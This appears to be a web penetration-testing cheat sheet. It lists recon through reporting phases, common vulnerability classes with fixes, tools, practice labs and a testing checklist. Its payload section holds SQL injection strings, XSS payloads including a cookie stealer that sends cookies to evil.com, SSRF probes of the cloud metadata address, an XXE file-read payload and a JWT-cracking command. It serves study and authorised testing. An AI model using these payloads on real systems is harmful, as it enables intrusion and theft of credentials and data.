⚑ WEB PENTEST

Quick-Reference Cheat Sheet  //  Ethical Hacking Edition

01Recon
β–Ά
02Scanning
β–Ά
03Enumeration
β–Ά
04Exploitation
β–Ά
05Post-Exploit
β–Ά
06Reporting
πŸ” 01 β€” Reconnaissance
WHOIS lookups β€” domain owner, registrar, datesPASSIVE
DNS enumeration β€” subdomains, MX, TXT, NS recordsPASSIVE
Google Dorking β€” exposed files, login pages, errorsPASSIVE
Shodan / Censys β€” open ports & bannersPASSIVE
theHarvester β€” emails, names, subdomainsOSINT
Wayback Machine β€” old endpoints & leaked contentPASSIVE
πŸ“‘ 02 β€” Scanning & Fingerprinting
Port scanning with Nmap β€” open services & versionsACTIVE
Web tech fingerprinting β€” Wappalyzer, WhatWebPASSIVE
SSL/TLS audit β€” weak ciphers, expired certsACTIVE
HTTP headers analysis β€” CORS, CSP, HSTS gapsPASSIVE
Spider / crawl β€” map all routes & formsACTIVE
πŸ—Ί 03 β€” Enumeration
Directory brute-force β€” hidden paths & admin panelsACTIVE
API endpoint discovery β€” /api/, /v1/, /swagger/ACTIVE
Parameter fuzzing β€” hidden or undocumented paramsACTIVE
User enumeration β€” login/register error differencesACTIVE
Source code & comments reviewMANUAL
πŸ’£ 04 β€” Exploitation
Inject payloads into identified entry pointsACTIVE
Bypass auth β€” default creds, JWT tampering, OAuth flawsACTIVE
IDOR β€” manipulate object IDs in requestsACTIVE
File upload abuse β€” bypass extension filtersACTIVE
Business logic flaws β€” price tampering, flow skippingMANUAL
🏴 05 β€” Post-Exploitation
Privilege escalation β€” elevate user roleACTIVE
Session hijacking β€” steal tokens / cookiesACTIVE
Data exfiltration β€” access sensitive recordsACTIVE
Lateral movement β€” pivot to internal systemsACTIVE
Persistence β€” backdoors, rogue accountsACTIVE
πŸ“‹ 06 β€” Reporting
Executive summary β€” business impact, non-technicalDOC
Findings per vuln: CVSS score, proof, steps to reproduceDOC
Remediation recommendations β€” specific & actionableDOC
Risk rating: Critical / High / Medium / Low / InfoDOC
πŸ’‰ SQL Injection (SQLi)
Unsanitized input hits DB queries directlyCRITICAL
Types: Classic, Blind (Boolean/Time), Error-based, OOBINFO
Test: ' OR 1=1-- in any input fieldTEST
Fix: Parameterized queries / prepared statementsFIX
πŸ“œ XSS β€” Cross-Site Scripting
Reflected: payload echoed in response immediatelyHIGH
Stored: payload saved in DB, hits every visitorCRITICAL
DOM-based: client-side JS writes attacker data to DOMHIGH
Fix: Output encoding + CSP headers + HttpOnly cookiesFIX
πŸ”— CSRF β€” Cross-Site Request Forgery
Forces authenticated user to make unwanted requestsHIGH
Test: Forge request from external origin, check if acceptedTEST
Fix: CSRF tokens + SameSite=Strict cookie attributeFIX
πŸ“‚ IDOR β€” Broken Object Auth
Manipulate IDs to access other users' dataHIGH
Example: /api/user/1337 β†’ change to /api/user/1338TEST
Also check: GUIDs, hashes, encoded valuesTEST
Fix: Server-side ownership checks on every resourceFIX
πŸ”‘ Broken Authentication
Weak passwords, no MFA, no lockout policyCRITICAL
JWT: check alg:none, weak secret, no expiryCRITICAL
Session tokens: predictable, long-lived, not invalidated on logoutHIGH
Fix: MFA + secure session management + token rotationFIX
🌐 SSRF β€” Server-Side Request Forgery
Server fetches attacker-controlled URL β€” hits internal infraCRITICAL
Test: Inject 127.0.0.1, 169.254.169.254 (AWS meta)TEST
Bypass: URL encoding, redirects, DNS rebindingTEST
Fix: Allowlist outbound URLs + block internal rangesFIX
πŸ—ƒ XXE β€” XML External Entity
Malicious XML reads server files or triggers SSRFCRITICAL
Test: Inject ENTITY referencing /etc/passwdTEST
Fix: Disable external entities in XML parser configFIX
πŸ“¦ Insecure Deserialization
Tampered serialized objects β†’ RCE or privilege escalationCRITICAL
Look for: base64 blobs, pickled data, Java serialized objectsTEST
Fix: Avoid deserializing untrusted data; use integrity checksFIX
πŸ•· Reconnaissance
Nmap β€” port scanner & service fingerprinterCLI
theHarvester β€” OSINT aggregatorCLI
Shodan β€” internet-wide scanner search engineWEB
Subfinder / Amass β€” subdomain enumerationCLI
Recon-ng β€” modular OSINT frameworkCLI
πŸ”¬ Scanning & Proxying
Burp Suite β€” intercept, modify, replay HTTPGUI
OWASP ZAP β€” free web app scanner + proxyGUI
Nikto β€” web server vulnerability scannerCLI
Gobuster / Feroxbuster β€” directory & file brute-forceCLI
WhatWeb / Wappalyzer β€” tech stack detectionCLI/EXT
πŸ’‰ Exploitation
SQLMap β€” automated SQL injection & takeoverCLI
Metasploit β€” exploit framework & payloadsCLI
XSStrike β€” advanced XSS scanner & fuzzerCLI
jwt_tool β€” JWT analysis, tampering & crackingCLI
Commix β€” command injection automationCLI
πŸ” Auth & Password
Hydra β€” fast network login brute-forcerCLI
Hashcat β€” GPU-powered hash crackerCLI
CrackMapExec β€” AD and network auth testingCLI
Burp Intruder β€” credential stuffing & fuzzingGUI
🧩 Wordlists & Payloads
SecLists β€” massive curated wordlist collectionREPO
RockYou.txt β€” classic password listFILE
PayloadsAllTheThings β€” exploit payload libraryREPO
FuzzDB β€” fuzzing patterns & attack stringsREPO
πŸ–₯ Platforms & Labs
HackTheBox β€” CTF machines & web challengesONLINE
TryHackMe β€” guided learning pathsONLINE
PortSwigger Web Academy β€” free vuln labs (Burp)ONLINE
DVWA / WebGoat β€” local intentionally vulnerable appsLOCAL
πŸ’‰ SQL Injection Starters
# Basic auth bypass
' OR 1=1--
admin'--
' OR '1'='1

# Time-based blind (MySQL)
' AND SLEEP(5)--

# Error-based
' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
πŸ“œ XSS Payloads
# Basic test
<script>alert('XSS')</script>

# Filter bypass variants
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
javascript:alert(1)

# Cookie stealer
<script>fetch('//evil.com?c='+document.cookie)</script>
🌐 SSRF Probes
# Local / loopback
http://127.0.0.1/admin
http://localhost:8080

# AWS metadata service
http://169.254.169.254/latest/meta-data/

# Bypass with DNS rebinding
http://spoofed.attacker.com # resolves to 127.0.0.1
πŸ—ƒ XXE Payload
<?xml version="1.0"?>
<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
πŸ”‘ JWT Tampering
# Decode header (base64)
{"alg":"HS256","typ":"JWT"}

# Try alg:none attack
{"alg":"none","typ":"JWT"}

# Brute-force weak secret
hashcat -a 0 -m 16500 token.txt rockyou.txt
πŸ“‘ Nmap Quick Scans
# Fast top-1000 port scan
nmap -T4 -F target.com

# Full scan + version + scripts
nmap -sV -sC -p- target.com

# Web vuln scripts
nmap --script http-vuln-* target.com
0 / 30 completed
πŸ” Reconnaissance
WHOIS + DNS enumeration completed
Subdomain discovery (Subfinder / Amass)
Google Dorking for exposed files / errors
Shodan / Censys search for open ports
Wayback Machine for old endpoints
πŸ“‘ Scanning
Full port scan with Nmap (-sV -sC)
Web tech stack identified (WhatWeb)
SSL/TLS tested β€” weak ciphers, expired certs
Security headers reviewed (CSP, HSTS, X-Frame)
Spider / crawl all routes and forms
πŸ—Ί Enumeration
Directory brute-force (Gobuster / Feroxbuster)
API endpoint discovery (/api/, /v1/, /swagger/)
Parameter fuzzing for hidden params
User enumeration via error messages
HTML source & JS comments reviewed
πŸ’£ Injection Testing
SQL injection tested on all input fields
XSS (Reflected, Stored, DOM) tested
Command injection on OS-interacting inputs
XXE on XML-accepting endpoints
SSRF on URL / webhook input fields
πŸ”‘ Authentication & Session
Default credentials tested
JWT tampered (alg:none, weak secret)
Session token entropy & expiry checked
CSRF tokens verified on state-changing requests
OAuth / SSO flow reviewed for misconfigurations
πŸ—‚ Access Control
IDOR tested across all object references
Horizontal & vertical privilege escalation tested
Forced browsing to restricted pages
HTTP method tampering (GET→POST→PUT→DELETE)
πŸ“‹ Reporting
All findings documented with PoC & screenshots